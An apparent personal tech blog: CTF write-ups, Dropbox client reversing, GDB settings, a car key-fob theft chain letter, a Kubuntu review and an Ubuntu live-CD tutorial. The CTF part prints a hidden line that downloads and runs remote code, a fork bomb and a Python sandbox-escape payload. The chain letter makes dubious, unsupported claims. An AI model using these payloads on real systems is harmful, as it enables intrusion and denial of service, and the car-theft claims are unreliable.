Uncategorized

CSAW CTF Quals 2014


Reversing 100

A zip archive was given eggshell-master.zip
I tried to run some of the python files included in it. But it crashed my machine.
Then I found a file named utils.pyc and I decompiled it using uncompile2.

/usr/local/bin/uncompyle2 utils.pyc                                                                                                            
# 2014.09.22 12:44:53 IST
#Embedded file name: /Users/kchung/Desktop/CSAW Quals 2014/rev100/utils.py
exec __import__('urllib2').urlopen('http://kchung.co/lol.py').read()
+++ okay decompyling utils.pyc 
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2014.09.22 12:44:53 IST

I opened http://kchung.co/lol.py link which displayed the following code:

import os
while True:
    try:
        os.fork()
    except:
        os.system('start')
# flag{trust_is_risky}

Reversing 200

A windows PE32 executable was given. Which was more or less a similar challenge to last year’s quals.

I ran the program and found that it prints an encrypted flag. I immediately loaded it in IDA with debugger and found that the program exits upon the detecting a debugger and an decryption function is called just before that. Kindly follow what is mentioned in this image to get the decrypted flag
Reversing 200

flag{reversing_is_not_that_hard!}

Networking 100

A pcap file was given:
Hint given was misleading. But I knew that flag would be transferred through a tcp connection as a plain text according to the point given for this challenge. I created a dump of the tcp connections as tcp.pcap. I used a tool called tcpflow which breaks down each and every tcp connection and stores its content in ASCII file.

tcpflow -r tcp.pcap

These are the various files created after running the above commmand.

058.179.133.087.62973-192.168.221.128.01301 192.168.221.128.01300-061.054.024.060.20302 192.168.221.128.01315-173.014.243.236.00080
074.095.093.093.16881-192.168.221.128.01302 192.168.221.128.01301-058.179.133.087.62973 192.168.221.128.01317-162.017.162.237.06881
173.014.243.233.16881-192.168.221.128.01277 192.168.221.128.01302-074.095.093.093.16881 192.168.221.128.01318-197.083.255.148.43786
192.168.221.128.01277-173.014.243.233.16881 192.168.221.128.01306-192.168.221.136.00023 192.168.221.128.01320-061.054.024.053.20202
192.168.221.128.01292-192.168.221.136.00022 192.168.221.128.01307-096.252.203.249.60974 192.168.221.128.01322-106.120.035.039.22827
192.168.221.128.01293-173.014.243.236.00080 192.168.221.128.01308-061.054.024.062.20402 192.168.221.136.00022-192.168.221.128.01292
192.168.221.128.01295-101.226.180.138.20902 192.168.221.128.01309-061.054.024.072.20402 192.168.221.136.00023-192.168.221.128.01306
192.168.221.128.01296-180.153.091.176.20802 192.168.221.128.01311-036.229.180.205.06881 197.083.255.148.43786-192.168.221.128.01318
192.168.221.128.01297-061.054.024.070.20202 192.168.221.128.01312-087.218.248.070.20388 alerts.txt
192.168.221.128.01298-071.245.166.078.51413 192.168.221.128.01313-064.087.001.236.16881 report.xml
192.168.221.128.01299-099.235.219.011.06881 192.168.221.128.01314-122.141.235.138.20802 tcp.pcap

Then I ran `strings` to check for any flag in plain text. And fortunately
I found the flag in plain text.

strings * | grep "flag"

flag{bigdataisaproblemnotasolution}

Exploitation 100

An ELF 32 binary file was given
I ran a strings command on it and flag was hard coded in it

flag{exploitation_is_easy!}

Exploitation 200

A python file was given.

In this problem all the functions except print and raw_input
are removed from the python shell which is given to us.

This is similar to python jail break challenge in plaidCTF 2013.
After a few google search I came to know that in Python, a type object has a __bases__ attribute which returns the list of all its base classes. It also has a __subclasses__ method that returns the list of all types that inherit from it. If we use __bases__ on a random
type, we can reach the top of the type hierarchy (object type), then read the subclasses of object to get a list of all types defined in the interpreter

().__class__.__bases__[0].__subclasses__()

40th index points to file function

In [10]: ().__class__.__bases__[0].__subclasses__()[40]
Out[10]: file

And the exploit is here:

().__class__.__bases__[0].__subclasses__()[40]('./key').read()

solution for more challenges would be added very soon.

Reversing Dropbox client application for fun


Dropbox is a cloud based file storage service used by more than millions of users. The security of the dropbox was not analyzed properly. Recently, I came across a paper titled Looking inside (Drop)box which was presented at USENIX. Paper explains how to reverse engineer the Dropbox client application and extracts the algorithm. Dropbox clients are mostly written in python. The author of the paper, Dhiru Kholia, has uploaded the essential scripts required to reverse engineer the Dropbox.

Lets start hacking

Unpacking and decrypting encrypted Dropbox bytecode

The first thing to do is to get the Dropbox

wget -O - "https://www.dropbox.com/download?plat=lnx.x86" | tar xzf -

Clone Dhruv’s dedrop repository

➜ (Dropbox) git clone https://github.com/kholia/dedrop

Its mentioned in the paper to run the Dropbox with a custom ld_preload. The shared object required for the custom ld_preload can be build using

➜ cd dedrop/src/dedrop
➜  dedrop (master) ls
all.py  main.c  Makefile  map  _marshal.py  opcode-generator.py  payload.o  payload.py
➜  dedrop (master) make                                                                                                                
objcopy -I binary -O elf32-i386 -B i386 payload.py payload.o
gcc -Wall -ggdb -fPIC -Wno-unused-but-set-variable -m32 -c -I/usr/include/python2.7 -o main.o main.c
gcc -Wall -ggdb -fPIC -Wno-unused-but-set-variable -m32 -shared -Wl,-soname -Wl,libdedrop.so -o libdedrop.so main.o payload.o -lpthread -ldl
➜  dedrop (master)  ls                                                                                                                  
all.py  libdedrop.so  main.c  main.o  Makefile  map  _marshal.py  opcode-generator.py  payload.o  payload.py
Now the shared object is ready for use:
➜ dedrop (master) export BLOB_PATH=$HOME/.dropbox-dist/dropbox
➜ dedrop (master) LD_PRELOAD=$HOME/Dropbox/dedrop/src/dedrop/libdedrop.so ~/.dropbox-dist/dropbox

You may get an output like this:

.
.
[+] writing to /home/seshagiri/Dropbox/dedrop/src/dedrop/pyc_decrypted/xml/sax/xmlreader.pyc
[+] writing to /home/seshagiri/Dropbox/dedrop/src/dedrop/pyc_decrypted/zipfile.pyc

:) :) :) w00t!

All the decrpyted bytecodes in .pyc file format has been written into pyc_decrypted directory

Decompile the decrypted files

I have written a small shell script to decompile all the pyc files in pyc_decrypted directory using uncompyle2 tool.

# /bin/bash
for i in `find | grep .pyc`
do
        filename=${i%%.pyc}
        echo  "Uncompiling $i"
        sudo uncompyle2 $i | head -n-3 > $filename.py
done

find . -name "*.pyc" -exec rm {} \;

We have all the decompiled programs in pyc_decrypt directory. Using these files, you can start building your own open source Dropbox client if you want now.

The authors have mentioned about breaking the two factor authentication used in Dropbox and also hijacking Dropbox accounts. As I am a beginner in RE, I haven’t looked into it further. I will be updating this article later for including the session hijacking and breaking two factor authentication of Dropbox accounts.

GDB Print Settings


GDB provides the following ways to control how arrays, structures, and symbols are printed.

These settings are useful for debugging programs in any language:

set print address
set print address on

GDB prints memory addresses showing the location of stack traces, structure values, pointer values, breakpoints, and so forth, even when it also displays the contents of those addresses. The default is on. For example, this is what a stack frame display looks like with set print address on:
(gdb) f
#0 set_quotes (lq=0x34c78 "<>")
at input.c:530
530 if (lquote != def_lquote)
set print address off

Do not print addresses when displaying their contents. For example, this is the same stack frame displayed with set print address off:
(gdb) set print addr off
(gdb) f
#0 set_quotes (lq="<>") at input.c:530
530 if (lquote != def_lquote)

You can use `set print address off’ to eliminate all machine dependent displays from the GDB interface. For example, with print address off, you should get the same text for backtraces on all machines–whether or not they involve pointer arguments.
show print address
Show whether or not addresses are to be printed.
When GDB prints a symbolic address, it normally prints the closest earlier symbol plus an offset. If that symbol does not uniquely identify the address (for example, it is a name whose scope is a single source file), you may need to clarify. One way to do this is with info line, for example `info line *0x4537′. Alternately, you can set GDB to print the source file and line number when it prints a symbolic address:

set print symbol-filename on
Tell GDB to print the source file name and line number of a symbol in the symbolic form of an address.
set print symbol-filename off
Do not print source file name and line number of a symbol. This is the default.
show print symbol-filename
Show whether or not GDB will print the source file name and line number of a symbol in the symbolic form of an address.
Another situation where it is helpful to show symbol filenames and line numbers is when disassembling code; GDB shows you the line number and source file that corresponds to each instruction.

Also, you may wish to see the symbolic form only if the address being printed is reasonably close to the closest earlier symbol:

set print max-symbolic-offset max-offset
Tell GDB to only display the symbolic form of an address if the offset between the closest earlier symbol and the address is less than max-offset. The default is 0, which tells GDB to always print the symbolic form of an address if any symbol precedes it.
show print max-symbolic-offset
Ask how large the maximum offset is that GDB prints in a symbolic address.
If you have a pointer and you are not sure where it points, try `set print symbol-filename on’. Then you can determine the name and source file location of the variable where it points, using `p/a pointer’. This interprets the address in symbolic form. For example, here GDB shows that a variable ptt points at another variable t, defined in `hi2.c’:

(gdb) set print symbol-filename on
(gdb) p/a ptt
$4 = 0xe008

Warning: For pointers that point to a local variable, `p/a’ does not show the symbol name and filename of the referent, even with the appropriate set print options turned on.

Other settings control how different kinds of objects are printed:

set print array
set print array on

Pretty print arrays. This format is more convenient to read, but uses more space. The default is off.
set print array off
Return to compressed format for arrays.
show print array
Show whether compressed or pretty format is selected for displaying arrays.
set print elements number-of-elements
Set a limit on how many elements of an array GDB will print. If GDB is printing a large array, it stops printing after it has printed the number of elements set by the set print elements command. This limit also applies to the display of strings. Setting number-of-elements to zero means that the printing is unlimited.
show print elements
Display the number of elements of a large array that GDB will print. If the number is 0, then the printing is unlimited.
set print null-stop
Cause GDB to stop printing the characters of an array when the first NULL is encountered. This is useful when large arrays actually contain only short strings.
set print pretty on
Cause GDB to print structures in an indented format with one member per line, like this:
$1 = {
next = 0x0,
flags = {
sweet = 1,
sour = 1
},
meat = 0x54 "Pork"
}

set print pretty off
Cause GDB to print structures in a compact format, like this:
$1 = {next = 0x0, flags = {sweet = 1, sour = 1}, \
meat = 0x54 "Pork"}

This is the default format.
show print pretty
Show which format GDB is using to print structures.
set print sevenbit-strings on
Print using only seven-bit characters; if this option is set, GDB displays any eight-bit characters (in strings or character values) using the notation \nnn. This setting is best if you are working in English (ASCII) and you use the high-order bit of characters as a marker or “meta” bit.
set print sevenbit-strings off
Print full eight-bit characters. This allows the use of more international character sets, and is the default.
show print sevenbit-strings
Show whether or not GDB is printing only seven-bit characters.
set print union on
Tell GDB to print unions which are contained in structures. This is the default setting.
set print union off
Tell GDB not to print unions which are contained in structures.
show print union
Ask GDB whether or not it will print unions which are contained in structures. For example, given the declarations
typedef enum {Tree, Bug} Species;
typedef enum {Big_tree, Acorn, Seedling} Tree_forms;
typedef enum {Caterpillar, Cocoon, Butterfly}
Bug_forms;

struct thing {
Species it;
union {
Tree_forms tree;
Bug_forms bug;
} form;
};

struct thing foo = {Tree, {Acorn}};
with set print union on in effect `p foo’ would print
$1 = {it = Tree, form = {tree = Acorn, bug = Cocoon}}
and with set print union off in effect it would print
$1 = {it = Tree, form = {...}}
These settings are of interest when debugging C++ programs:

set print demangle
set print demangle on
Print C++ names in their source form rather than in the encoded (“mangled”) form passed to the assembler and linker for type-safe linkage. The default is `on’.
show print demangle
Show whether C++ names are printed in mangled or demangled form.
set print asm-demangle
set print asm-demangle on
Print C++ names in their source form rather than their mangled form, even in assembler code printouts such as instruction disassemblies. The default is off.
show print asm-demangle
Show whether C++ names in assembly listings are printed in mangled or demangled form.
set demangle-style style
Choose among several encoding schemes used by different compilers to represent C++ names. The choices for style are currently:
auto
Allow GDB to choose a decoding style by inspecting your program.
gnu
Decode based on the GNU C++ compiler (g++) encoding algorithm. This is the default.
lucid
Decode based on the Lucid C++ compiler (lcc) encoding algorithm.
arm
Decode using the algorithm in the C++ Annotated Reference Manual. Warning: this setting alone is not sufficient to allow debugging cfront-generated executables. GDB would require further enhancement to permit that.
foo
Show the list of formats.
show demangle-style
Display the encoding style currently in use for decoding C++ symbols.
set print object
set print object on
s
When displaying a pointer to an object, identify the actual (derived) type of the object rather than the declared type, using the virtual function table.
set print object off
Display only the declared type of objects, without reference to the virtual function table. This is the default setting.
show print object
Show whether actual, or declared, object types are displayed.
set print static-members
set print static-members on

Print static members when displaying a C++ object. The default is on.
set print static-members off
Do not print static members when displaying a C++ object.
show print static-members
Show whether C++ static members are printed, or not.
set print vtbl
set print vtbl on

Pretty print C++ virtual function tables. The default is off.
set print vtbl off
Do not pretty print C++ virtual function tables.
show print vtbl
Show whether C++ virtual function tables are pretty printed, or not.

How to Lock Your Car and Why ?


I locked my car. As I walked away I heard my car door unlock. I went back and locked my car again three times. Each time, as soon as I started to walk away, I would hear it unlock again!! Naturally alarmed, I looked around and there were two guys sitting in a car in the fire lane next to the store. They were obviously watching me intently, and there was no doubt they were somehow involved in this very weird situation. I quickly chucked the errand I was on, jumped in my car and sped away. I went straight to the police station, told them what had happened, and found out I was part of a new, and very successful, scheme being used to gain entry into cars. Two weeks later, my friend’s son had a similar happening….

While traveling, my friend’s son stopped at a roadside rest to use the bathroom. When he came out to his car less than 4-5 minutes later, someone had gotten into his car and stolen his cell phone, laptop computer, GPS navigator, briefcase……you name it. He called the police and since there were no signs of his car being broken into, the police told him he had been a victim of the latest robbery tactic — there is a device that robbers are using now to clone your security code when you lock your doors on your car using your key-chain locking device..

They sit a distance away and watch for their next victim. They know you are going inside of the store, restaurant, or bathroom and that they now have a few minutes to steal and run. The police officer said to manually lock your car door-by hitting the lock button inside the car — that way if there is someone sitting in a parking lot watching for their next victim, it will not be you.

When you hit the lock button on your car upon exiting, it does not send the security code, but if you walk away and use the door lock on your key chain, it sends the code through the airwaves where it can be instantly stolen. This is very real.

Be wisely aware of what you just read and please pass this note on. Look how many times we all lock our doors with our remote just to be sure we remembered to lock them — and bingo, someone has our code…and whatever was in our car.

Please share with everyone you know!!

Note: The receiving device is known as a “Spectrum Analyzer” and the signal can be recorded and played back to unlock the car door. True!

Migrated to Kubuntu


Kubuntu 11.04 had been released in the last month. I have been using it since. I found it  as very interesting because of its wide variety of applications. The default window manager KWIN is capable of producing visual effects without installing extra packages. Ubuntu cannot withheld some of the features of Kubuntu. Kubuntu is user friendly than Ubuntu. The problem regarding with Kubuntu : some time it crashes!  Just after installation, it crashed. Ubuntu never crashed in my system! KWIN (Default window manger in Kubuntu) has so many bugs and its time for the newbies to prove themselves – what they are by fixing some bugs! The desktop cube effect is pretty good when compared to the compiz desktop cube of Ubuntu. Widgets are one of the attractive features of the KDE. I am using folder view, face book, analog clock widgets. Mobile view of Face book can be available through Facebook widget. The default video player is dragon player, well i don’t like it at all. I am a hardcore fan of VLC. The default audio player is my favorite: Amarok, It might be one of the reason to migrate to Kubuntu. Amarok works pretty well in Kubuntu (It never worked in Ubuntu).
Ratings
Look and performance: 8/10.
Stability: 7/10.

How to make a Custmized Ubuntu live DVD


How-To: Customize your Ubuntu Live CD

Live CD are great, they let you try out a distribution without installing it. They allow you to run your favorite distribution on any computer and on the top of this, they become handy to recover a system.

Ubuntu live CD is already packed up with some pretty nifty software that allow you to do pretty much everything with the Live CD, but still, they might be some software you don’t need that are include with it or, some software you need might be missing.

Another Pro for this is that by customizing your image, you will be able to install

This tutorial will show the steps to follow in order to customize an Ubuntu Live CD to your need by removing some component and adding some others.

During this tutorial, we are going to remaster our Ubuntu Gutsy Gibbon 7.10 Live CD with the following spec:

  • remove non english language pack
  • Update the softwares release shiiped in the live CD
  • Enable universe and multiverse repository
  • Include divx, mp3 support, realplayer ….
  • Include ndiswrapper support
  • Add Firefox flash-nonfree plugin, add skype.
  • Add some network troubleshooting tools: traceroute, wireshark, kismet…

The resulting image will be bigger that 800M, so it won’t fit on a CD, but will be fine on a DVD.

1. Preparing the host

First of all, we need to get the current karmic Live CD image and store it let say on ~/Desktop , also, we will need to install an extra piece of software to rebuild our karmic live CD’s squashfs:

$ sudo apt-get install squashfs-tools chroot

Now let’s get started by setting up our working environment. First, we are going to mount the iso under /tmp/livecd:

$ mkdir /tmp/livecd
$ sudo mount -o loop ~/Desktop/ubuntu-9.10-desktop-i386.iso /tmp/livecd

Then create a directory containing our future CD image (cd) in our working directory (~/livecd) and copy all the CD content but casper/filesystem.squashfs in our ~/livecd/cd directory:

$ mkdir ~/livecd
$ mkdir ~/livecd/cd
$ rsync –exclude=/casper/filesystem.squashfs -a /tmp/livecd/ ~/livecd/cd

This copy all but the squashfs file, which is the compressed file containing our live CD filesystem.

Now we need to mount casper/filesystem.squashfs onto a directory called ~/livecd/squashfs in order to copy its content in a directory where we are going to edit our live CD filesystem: ~/livecd/custom

$ mkdir ~/livecd/squashfs
$ mkdir ~/livecd/custom
$ sudo modprobe squashfs
$ sudo mount -t squashfs -o loop /tmp/livecd/casper/filesystem.squashfs ~/livecd/squashfs/
$ sudo cp -a ~/livecd/squashfs/* ~/livecd/custom

And finally, let copy /etc/resolv.conf and /etc/hosts to our ~/livecd/custom/etc so we will be able to access network from within the image we are going to customize (through chroot):

$ sudo cp /etc/resolv.conf /etc/hosts ~/livecd/custom/etc/

2. Getting into our future image:

In order to customize the image, we will chroot into ~/livecd/custom directory, mount some necessary pseudo-filesystem (/proc and /sys). From there, we will be able to customize our Live CD.

$ sudo chroot ~/livecd/custom
# mount -t proc none /proc/
# mount -t sysfs none /sys/
# export HOME=/root

Now we are ready, let’s customize….

How-To: Customize your Ubuntu Live CD — page 2

3. Customizing our future live CD

3.1. Removing packages

First of all, we are going to remove non-english language pack, and in order to free some more space, we are going to remove gnome-games packages.

# apt-get remove –purge gnome-games*
# apt-get remove –purge `dpkg-query -W –showformat=’${Package}\n’ | grep language-pack | egrep -v ‘\-en’`

Mind that you might want to remove some other software. In order to see installed software, you can run the following:

# dpkg-query -W –showformat=’${Package}\n’ | less

3.2. Updating the existing image

Now that we have remove softwares we do not need, we can update our /etc/apt/sources.list in order to enable universe and multiverse repository along with gutsy-updates, gutsy-security and the partner repository so we can install vmware-server.

Open and edit /etc/apt/sources.list

# vim /etc/apt/sources.list

and make it look like:

deb http://archive.ubuntu.com/ubuntu karmic main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu
karmic main restricted universe multiverse

deb http://archive.ubuntu.com/ubuntu karmic-updates main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu
karmic-updates main restricted universe multiverse

deb http://security.ubuntu.com/ubuntu karmic-security main restricted universe multiverse
deb-src http://security.ubuntu.com/ubuntu
karmic-security main restricted universe multiverse

deb http://archive.canonical.com/ubuntu karmic partner
deb-src http://archive.canonical.com/ubuntu
karmic partner

deb http://ppa.launchpad.net/openoffice-pkgs/ubuntu karmic main
deb-src http://ppa.launchpad.net/openoffice-pkgs/ubuntu karmic main

deb http://ppa.launchpad.net/compiz/ubuntu karmic main
deb-src http://ppa.launchpad.net/compiz/ubuntu karmic main

deb http://ppa.launchpad.net/netbook-remix-team/ubuntu karmic main
deb-src http://ppa.launchpad.net/netbook-remix-team/ubuntu karmic main

deb http://ppa.launchpad.net/lidaobing/ppa/ubuntu karmic main
deb-src http://ppa.launchpad.net/lidaobing/ppa/ubuntu karmic main

deb http://ppa.launchpad.net/asac/ppa/ubuntu karmic main
deb-src http://ppa.launchpad.net/asac/ppa/ubuntu karmic main

deb http://ppa.launchpad.net/globalmenu-team/ubuntu karmic main
deb-src http://ppa.launchpad.net/globalmenu-team/ubuntu karmic main

deb http://ppa.launchpad.net/themuso/ubuntu karmic main
deb-src http://ppa.launchpad.net/themuso/ubuntu karmic main

deb http://ppa.launchpad.net/zulcss/ubuntu karmic main
deb-src http://ppa.launchpad.net/zulcss/ubuntu karmic main

deb http://ppa.launchpad.net/q-funk/ubuntu karmic main
deb-src http://ppa.launchpad.net/q-funk/ubuntu karmic main

deb http://ppa.launchpad.net/ted-gould/ubuntu karmic main
deb-src http://ppa.launchpad.net/ted-gould/ubuntu karmic main

deb http://ppa.launchpad.net/hyperair/ubuntu karmic main
deb-src http://ppa.launchpad.net/hyperair/ubuntu karmic main

deb http://ppa.launchpad.net/bigon/ubuntu karmic main
deb-src http://ppa.launchpad.net/bigon/ubuntu karmic main

deb http://ppa.launchpad.net/gnomefreak/ubuntu karmic main
deb-src http://ppa.launchpad.net/gnomefreak/ubuntu karmic main

deb http://ppa.launchpad.net/marceloshima/ubuntu karmic main
deb-src http://ppa.launchpad.net/marceloshima/ubuntu karmic main

deb http://ppa.launchpad.net/freenx-team/ubuntu karmic main
deb-src http://ppa.launchpad.net/freenx-team/ubuntu karmic main

deb http://ppa.launchpad.net/bhavi/ubuntu karmic main
deb-src http://ppa.launchpad.net/bhavi/ubuntu karmic main

deb http://ppa.launchpad.net/scott/ubuntu karmic main
deb-src http://ppa.launchpad.net/scott/ubuntu karmic main

deb http://ppa.launchpad.net/intuitivenipple/ubuntu karmic main
deb-src http://ppa.launchpad.net/intuitivenipple/ubuntu karmic main

deb http://ppa.launchpad.net/suraia/ubuntu karmic main
deb-src http://ppa.launchpad.net/suraia/ubuntu karmic main

deb http://ppa.launchpad.net/gwibber-daily/ppa/ubuntu karmic main
deb-src http://ppa.launchpad.net/gwibber-daily/ppa/ubuntu karmic main

Now we can update the image by running:

# apt-get update
# apt-get dist-upgrade

3.3. Installing new packages

Let install all multimedia packages that we might need. As per http://www.debuntu.org/how-to-play-dvd-under-ubuntu-linux, we need to install:

# apt-get install gstreamer0.10-ffmpeg gstreamer0.10-plugins-ugly gstreamer0.10-plugins-ugly-multiverse gstreamer0.10-plugins-bad gstreamer0.10-plugins-bad-multiverse vlc mplayer mplayer-fonts
# /usr/share/doc/libdvdread3/install-css.sh

Then, let install RealPlayer:

# wget http://www.debian-multimedia.org/pool/main/r/realplay/realplayer_10.0.9-0.1_i386.deb -O /tmp/realplay.deb
# dpkg -i /tmp/realplay.deb

Now, let’s install some utils that are not included by default on Ubuntu live cd but become handy most of the time:

# apt-get install rar unrar unace-nonfree

Plus, let’s install some wireless network utils so we might be able to get wireless functionning with the live CD:

# apt-get install ndiswrapper-common ndiswrapper-utils-1.9 cabextract unshield \
bcm43xx-fwcutter \
kismet aircrack-ng

Let’s add some other network network utility tools:

# apt-get install wireshark nmap ettercap traceroute

Also, we are going to add some firefox plugins:

# apt-get install flashplugin-nonfree mozilla-plugin-vlc

On the top of this, I want to be able to use skype and vmware-server:

# apt-get install libqt4-core libqt4-gui
# wget http://skype.com/go/getskype-linux-ubuntu -O /tmp/skype.deb
# dpkg -i /tmp/skype.deb
# apt-get install vmware-server

Well, that’s about it, we now have whatever software that we (I) will need when using our live CD.
It is now about time to do some clean up.

4. Cleaning up the chroot

When we install packages, apt caches the packages, we will need to remove them in order to save some space:

# apt-get clean

Also, there is some files in /tmp that need to be removed:

# rm -rf /tmp/*

Before chrooting, we have added 2 files: /etc/hosts and /etc/resolv.conf, let remove them:

# rm -f /etc/hosts /etc/resolv.conf

Finally, we are ready to exit the chroot and repack the CD. We need first to umount /proc and /sys:

# umount /proc/
# umount /sys/
# exit

Finally, we are back to our host, as we have modified some packages, we need to rebuild some manifest files, recreate the squashfs and recreate the ISO.

5. Recreating the ISO

Fisrt, lets recreate the manifest files:

$ chmod +w ~/livecd/cd/casper/filesystem.manifest
$ sudo chroot ~/livecd/custom dpkg-query -W –showformat=’${Package} ${Version}\n’ > ~/livecd/cd/casper/filesystem.manifest
sudo cp ~/livecd/cd/casper/filesystem.manifest ~/livecd/cd/casper/filesystem.manifest-desktop

And regenerate the squashfs file:

$ sudo mksquashfs ~/livecd/custom ~/livecd/cd/casper/filesystem.squashfs
Parallel mksquashfs: Using 2 processors
Creating little endian 3.0 filesystem on ~/livecd/cd/casper/filesystem.squashfs, block size 65536.
….
….

Now, alternatively, you might want to customize the file: ~/livecd/cd/README.diskdefines
and finally, update ~/livecd/cd/md5sum.txt which contains the files in ~/livecd/cd md5 sums:

$ sudo rm ~/livecd/cd/md5sum.txt
$ sudo -s
# (cd ~/livecd/cd && find . -type f -print0 | xargs -0 md5sum > md5sum.txt)

We are now almost done, the last thing left is too create the ISO with the following command:

$ cd ~/livecd/cd
$ sudo mkisofs -r -V “Ubuntu-Live-Custom” -b isolinux/isolinux.bin -c isolinux/boot.cat -cache-inodes -J -l -no-emul-boot -boot-load-size 4 -boot-info-table -o ~/Desktop/Ubuntu-Live-7.10-custom.iso .

Here you go, you can now test your image by either booting your computer with or by using a virtualization/emulation software such as qemu, kvm, vmware…..

6. Conclusion

With a bit of work, one can customize an Ubuntu Live CD in order to remove/include some softwares, make sure the live CD is up-to-date, and on the top of this, allow administrator to deploy pre-customized Ubuntu distros.

The common mitake i found was in

sudo mkisofs -r -V “Ubuntu-Live-Custom” -b isolinux/isolinux.bin -c isolinux/boot.cat -cache-inodes -J -l -no-emul-boot -boot-load-size 4 -boot-info-table -o ~/Desktop/Ubuntu-Live-7.10-custom.iso . <===

the . <== represents current drectory

it will show an error genisoimage

add a space and . at the end